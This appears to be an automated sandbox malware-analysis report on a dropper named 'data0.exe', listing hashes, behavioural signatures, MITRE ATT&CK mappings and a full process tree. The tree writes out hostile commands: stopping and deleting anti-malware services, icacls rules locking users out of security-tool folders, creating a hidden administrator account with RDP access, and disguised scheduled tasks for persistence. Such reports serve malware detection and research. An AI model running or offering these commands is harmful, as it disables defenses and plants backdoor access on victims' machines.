Analysis
-
max time kernel
139s -
max time network
143s -
platform
windows10-1703_x64 -
resource
win10-20240404-uk -
resource tags
-
submitted
11-08-2024 23:24
General
-
Target
data0.exe
-
Size
107.5MB
-
MD5
582a7ccf130d82fd670e8f5bb03b115f
-
SHA1
a4bc2cb2296aa981cc4c10940e691cf7490d9759
-
SHA256
a653745c5da2c86b3ad137d82c20eb3f23a07e229362c068f0b01071cb448d53
-
SHA512
b01a22d3cfb0348c55babb4ae4a998f90da4920ac0ecc8ce57549fa20e550ac4740eccdba96ef379c754a0ae77e591be4a420ca5e732d0d98d1de59bee68c889
-
SSDEEP
3145728:4tfe2BYoE8uO/6t9yNNOnEok4GpEYr1TShId6/n:iWKk9yNNOE9luk1dda
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
-
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
-
Blocks application from running via registry modification 27 IoCs
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 2 IoCs
-
Modifies Windows Firewall 2 TTPs 8 IoCs
-
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 12 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 28 IoCs
-
Themida packer 54 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 5 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Modifies WinLogon 2 TTPs 4 IoCs
-
AutoIT Executable 45 IoCs
AutoIT scripts compiled to PE executables.
-
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Drops file in Program Files directory 8 IoCs
-
Drops file in Windows directory 1 IoCs
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 1 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Modifies data under HKEY_USERS 33 IoCs
-
NTFS ADS 5 IoCs
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 19 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\data0.exe"C:\Users\Admin\AppData\Local\Temp\data0.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Setup\GameGuard.exe"C:\ProgramData\Setup\GameGuard.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocks application from running via registry modification
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc delete swprv4⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop mbamservice4⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc delete mbamservice4⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc delete crmsvc4⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exegpupdate /force4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\Delete.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 54⤵
- Delays execution with timeout.exe
-
-
-
-
C:\ProgramData\Setup\update.exe"C:\ProgramData\Setup\update.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\RealtekCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\TaskCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\ProgramData\Setup\Game.exeC:\ProgramData\Setup\Game.exe -ppidar3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\ReaItekHD\taskhost.exe"C:\ProgramData\ReaItekHD\taskhost.exe"4⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
-
-
C:\ProgramData\Setup\Packs.exeC:\ProgramData\Setup\Packs.exe -ppidar5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
C:\ProgramData\ReaItekHD\taskhostw.exe"C:\ProgramData\ReaItekHD\taskhostw.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
-
C:\ProgramData\Setup\svchost.exeC:\ProgramData\Setup\svchost.exe -ppidar3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Setup\IP.exe"C:\ProgramData\Setup\IP.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Setup\smss.exe"C:\ProgramData\Setup\smss.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second6⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add5⤵
-
C:\Windows\system32\net.exenet user John 12345 /add6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add7⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add5⤵
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add7⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add5⤵
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add7⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add5⤵
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add7⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add5⤵
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add7⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add5⤵
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add7⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add5⤵
- Remote Service Session Hijacking: RDP Hijacking
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add6⤵
- Remote Service Session Hijacking: RDP Hijacking
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add7⤵
- Remote Service Session Hijacking: RDP Hijacking
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat3⤵
- Drops file in Drivers directory
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵
-
C:\Windows\system32\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵
-
C:\Windows\system32\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" LanguagePackInstaller1⤵
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" LanguagePackInstaller1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
1Hidden Users
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
5Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
35.3MB
MD5911a11639a40d412466ac9bfca7c1ea1
SHA1bd79203199a3aa9b4222a80bfe070902c50089b9
SHA25691303120d9f0da0918f412b1a50134fe780835457b18624013e7502b6171e6dd
SHA51220a0f6faab8619456dfb8cf5397951a56ea1bff4a3388029a7d19e88b4883cdf2635dcc9c2b71018c1edf1755546924761fd9eb11405fdcb54379c96ec380bdf
-
Filesize
41.0MB
MD5fb480c32023d05d54f48c3782b28026c
SHA124a290da0a96d0d311729a4e58a51ef9342be9af
SHA256a2984435e72316211056bb2ca444312a2c4fe09c0a904e63ca881d9ab026838b
SHA51245991d2ead79396b9a76cffa7d0917671e39317b3ccb73084bc12a3d742730f970ea96ace410da37d397ca5612debd5fc335c5458a449737a468ba3cfaf58312
-
Filesize
7.1MB
MD5a53aad9148d0b6697e1ba2a8b5a095d1
SHA1af28d7609e183571de45064d22af05637fe945a8
SHA256a4f2c71f97cb21679ea323a184c2a7f5b528ecbfcdeaf62f866422bf69eb038c
SHA512a2418f2ee0efa1eca66335be818ede911a7f765032f295884036fedfc5756bb4b10d34dfbc8439f30d3e38b8cd3c6debaa24c940aed6a1d9f8a3d298ab630cab
-
Filesize
5.3MB
MD5dadef5f5098a82ba41c7647020aaabfd
SHA1de27ea9b45e4b36815574587fcb94cba6002115a
SHA25680a027ac2189d5a129998341fb4bd097936b7f76240f75fd8c5d4d197dfaee48
SHA512b25f7819ed83b45ad1710e5c30ad99e9d932db3a677388b10f5509021d945c6caf4af4db7c97320fecbc5a5cee967b219c123a1e8cb033053fc1ac0cb599febb
-
Filesize
23.3MB
MD552b38e93ef4e9978f49ec43566752a81
SHA1436c08225acbae7af8319d0da5c1a8c8728c212b
SHA2565e93706262c7c45acb57916c084ef350ad0823d73f7db14f4f8586c7e51b9de7
